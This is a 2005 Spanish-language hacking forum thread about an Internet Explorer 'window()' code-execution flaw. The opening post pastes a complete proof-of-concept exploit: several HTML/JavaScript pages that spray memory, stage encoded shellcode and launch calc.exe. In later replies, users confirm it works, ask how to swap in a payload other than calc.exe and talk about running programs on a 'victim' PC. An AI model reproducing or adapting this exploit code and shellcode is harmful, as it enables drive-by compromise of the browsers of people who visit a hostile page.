elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:50  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Internet Explorer "window()" Code Execution Vulnerability		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Internet Explorer "window()" Code Execution Vulnerability  (Leído 10,760 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Microsoft Internet Explorer "window()" Code Execution Vulnerability
« en: 21 Noviembre 2005, 17:18 »
Exploit:
Código:
<html>

<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type="text/javascript">

function runpoc(iframecount)
{

document.getElementById('table1').rows[2].cells[0].innerHTML="<p align=center><B>
<font color=#339966 size=1 face=Arial>&nbsp;&nbsp;&nbsp;&nbsp;loading, please wait....
</font></p>"
document.getElementById('table1').rows[4].cells[0].innerHTML=""
document.getElementById('table1').rows[6].cells[0].innerHTML=""
document.getElementById('table1').rows[7].cells[0].innerHTML=""
document.getElementById('table1').rows[9].cells[0].innerHTML=""


top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')

top.consoleRef.blur();

top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)

self.focus() // Ensure the javascript prompt boxes are hidden in the background


for (i=1 ; i <=iframecount ; i++)
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=fillmem.htm></iframe>')
}

if( iframecount == 8 ){
//alert('8');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert('4');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0 src=bug.htm></iframe>'
//)



}
</script>
</head>

<body onLoad="self.moveTo(0,0);self.resizeTo(screen.width,screen.height);">

<p>&nbsp;</p>
<p>&nbsp;</p>

<table border="0" width="100%" id="table1">
<tr>
<td>
<p align="center"><font color="#333333"><b><font size="1" face="Arial">
Microsoft Internet Explorer javascript Window() Proof of Concept</font></b>
</font></td>
</tr>

<tr>
<td width="98%" height="15">
<p align="center"><b><font face="Arial" size="1" color="#333333">Select
your operating system:-</font></b></td>
</tr>
<tr>
<td width="98%" height="10"></td>
</tr>
<tr>
<td width="98%" height="27" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(4)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows XP (All Service Packs)</font></span></a><font color="#333333"> </font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="22" align="center">
<p><b><font color="#339966" size="1" face="Arial">
-</font><font color="#333333"><font color="#333333" size="1" face="Arial"> </font> </font>
<font color="#333333" size="1" face="Arial"><a href="#" onclick="javascript:runpoc(8)">
<span style="text-decoration: none"><font color="#333333">Microsoft
Windows 2000/Universal (Slower)</font></span></a><font color="#333333"> </font></font>
<font color="#339966" size="1" face="Arial"> -</font></b></td>
</tr>
<tr>
<td width="98%" height="15" align="center">
</td>
</tr>
<tr>
<td width="98%" height="15" align="center">
<b><font color="#339966" face="Arial" size="1">invokes calc.exe if
successful</font></b></td>
</tr>
</table>

</body>
</html>

--------------------------------------------------------------------------------------------------------------

<-- blankWindow.htm -->

<HTML>
<TITLE>Blank Window</title>
<body></body>
</html>

--------------------------------------------------------------------------------------------------------------

<--    fillmem.htm   -->

<HTML>
<HEAD>
<Script Language="javascript">
function load() {

var spearson=0
var eip = ""
var prep_shellcode = ""
var shellcode = ""
var fillmem = ""


//
// Address called by the bug (also serves as slide code)
//
for (spearson=1 ; spearson <=500 ; spearson++)
{
eip = eip + unescape("%u7030%u4300")
//eip = eip + unescape("%u4300")
}


//
// Create a large chunk for memory saturation
//
for (spearson=1 ; spearson <=200; spearson++)
{
fillmem = fillmem + eip
}

//
// Search for our shellcode (tagged with my initials) and copy to a more stable area
//
prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
"%u002d%ua5F3%u9090%u905f%ue7ff")

//
// Harmless Calc.exe
//
shellcode = unescape("%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")


fillmem = fillmem + prep_shellcode + shellcode

prompt(fillmem,"Computer Terrorism (UK) Ltd - Internet Explorer Vulnerability")

}
// -->
</Script>
</head>
<TITLE>Windows Explorer Exploit</TITLE>
<body onload="setTimeout('load()',2000)">
test test test
</body>
</html>

--------------------------------------------------------------------------------------------------------------

<--    bug2k.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',20000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>


--------------------------------------------------------------------------------------------------------------

<--    bug.htm   -->

<html>
<TITLE>Crash2</title>
<body onload="setTimeout('main()',6000)">

<SCRIPT>

function main()
{

document.write("<TITLE>hello2</TITLE>")
document.write("<body onload=window();>")

window.location.reload()

}
</SCRIPT>
<br><br><br><br><br><br><center><FONT FACE=ARIAL SIZE 12PT>Please Wait !
</FONT></center>

mas info:

http://www.frsirt.com/english/advisories/2005/2509

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #1 en: 21 Noviembre 2005, 17:43 »
Alguien me puede explicar que funcion hace este exploit ejecuta commandos ¿? como se utiliza lo guardo como html si pero que hace y solo es entrar en la web en la que esta alojado y otra pregunta.

Porque se encuentran tantas vulnreabilidades en ie si no hay codigo del programa filtrado ni nada.Como lo hacne no lo entiendo.

Gracias.
« Última modificación: 21 Noviembre 2005, 17:45 por Isirius » En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #2 en: 21 Noviembre 2005, 17:56 »
Citar
Alguien me puede explicar que funcion hace este exploit ejecuta commandos ¿? como se utiliza lo guardo como html si pero que hace y solo es entrar en la web en la que esta alojado

Prueba de Concepto:

http://www.computerterrorism.com/research/ie/poc.htm

prueba con tu IE, cuando cargue la pagina, dale a la opcion que deseas ejecutar:


Código:
- Microsoft Windows XP (All Service Packs) -
 
- Microsoft Windows 2000/Universal (Slower) -

se ejecutara una ventana de comandos, y en mi caso se cerro el explorer :-\

Citar
Porque se encuentran tantas vulnreabilidades en ie si no hay codigo del programa filtrado ni nada.Como lo hacne no lo entiendo.
en el foro de noticias, hace tiempo postee un articulo de tom ferris, que explica como encontrar vulnerabilidades paso&paso, que basicamente consiste prueba/error

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #3 en: 21 Noviembre 2005, 18:16 »
Respecto al articulo ese de encotnar vulnerabilidades lo buscare ahora rapidamente tengo ganas de leerlo eso era lo qeu yo andaba buscando muchisimas gracias y respecto a como emplear el exploit sigo sin entenderlo solo caudno abro esa pagina me sale error pero no puedes hacer algo remotamente sigo sin entender la funcion.

Posdara-Muchisimas gracias por lo de buscar vulnerabilidades paso a paso lo voy a buscar ojala lo encuentre.
En línea
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #4 en: 21 Noviembre 2005, 18:20 »
Mousehack es este  http://www.eweek.com/article2/0,1759,1879141,00.asp esta en ingles intentare traducirlo por que de ingles 0 lo intentare jejee.

O es lo mismo que esto¿?

* Saber dónde mirar: un buen consejo es mirar en las partes del programa donde se validan entradas, sobre todo cuando provienen de un protocolo exterior, como RDP. Tampoco es mala idea mirar los sitios que Microsoft acaba de parchear. "Muchas veces introducen un nuevo fallo donde han parcheado", dice Ferris.
    * Obtener el código: y puesto que el de Microsoft es propietario no queda más remedio que recurrir a la ingeniería inversa, utilizando depuradores como SoftICE, y desensambladores como IDA Pro para traducir las DLLs -o los ejecutables- a ensamblador.
    * Encontrar el agujero: a tal fin, Ferris construye algún tipo de script capaz de probar miles de datos intencionadamente malformados contra los puntos del programa que se sospechan débiles. Eventualmente, se logra hacer caer al programa.
    * Analizar la vulnerabilidad: es decir, comprobar si es o no crítica, si es factible escribir un exploit, etc
En línea
loco5

Desconectado Desconectado

Mensajes: 217


¡Amo YaBB SE!


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #5 en: 21 Noviembre 2005, 21:59 »
http://www.computerterrorism.com/research/ie/poc.htm


en mi caso se me cuelga en iexplorer y nada de nada :'(
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #6 en: 21 Noviembre 2005, 22:20 »
fijate si tienes activado el ¨Active Scripting¨ en el IE:

herramientas-->opciones de internet-->seguridad-->nivel personalizado-->

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #7 en: 21 Noviembre 2005, 22:28 »
A mi tambien see me colgo el Firefox...
En línea
:laugh: Tracker privado Nova+
Thor


Desconectado Desconectado

Mensajes: 1.176


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #8 en: 21 Noviembre 2005, 22:46 »
Firefox?
A mi en Iexplorer me ha funciondo bien, se me ha abierto la calculadora y tras eso unos cuantos errores de iexplorer.
En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #9 en: 21 Noviembre 2005, 23:23 »
a mi tambien me peta, el IE, se abre el la calculadora, yo rulo con win2000, sera en el xp el error
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #10 en: 22 Noviembre 2005, 00:49 »
confirmado: tambien funciona con el firefox causando un denial of service

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
/* strcpy() */


Desconectado Desconectado

Mensajes: 367


FLEMA - The Ramones - Sex Pistols


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #11 en: 22 Noviembre 2005, 04:35 »
A mi me peto en XP con IE
Al ver la calculadora, se me vienen
a la cabeza muchas ideas, lamentablemente
son destructivas xDDDDD
En línea
Sigo asi
Soy feliz
yo elegí
Sexo, Drogas y PunkRock
Isirius
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.492



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #12 en: 22 Noviembre 2005, 12:09 »
A mi solo se me cuelga el ie nada mas  :-\  eso quiere decir que si se lo ago a otra pesona debe tener activado el scripting ese verdad si no nada¿?
En línea
zanzibar

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #13 en: 22 Noviembre 2005, 12:59 »
El codigo tiene algunos errores js mirarlos una vez resueltos no me dió ningún problema.

Lo que no se es obtener la cadena para decodificar otro objetivo que no sea el calc.exe, a ver si me podeis hechar una mano.
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #14 en: 22 Noviembre 2005, 13:15 »
Cita de: Isirius en 22 Noviembre 2005, 12:09
A mi solo se me cuelga el ie nada mas  :-\  eso quiere decir que si se lo hago a otra pesona debe tener activado el scripting ese verdad si no nada¿?
la mayoria de los navegadores tienen activado javascript por defecto.En cuanto al codigo, lo subi a mi server y funciono OK sin errores.Seria ¨educativo¨ aportar ideas de modificar el codigo llamando a un programa distinto en la PC ¨victima¨.Veamos que sale ;)

Salu2
En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguna manera de "desactivar" el modo InPrivate de Internet Explorer
Hacking Básico 		oisac 0 1,124 Último mensaje 8 Mayo 2011, 11:57
por oisac
Microsoft lanza la segunda "Platform Preview" de Internet Explorer 10, con el...
Noticias 		wolfbcn 0 432 Último mensaje 30 Junio 2011, 18:46
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines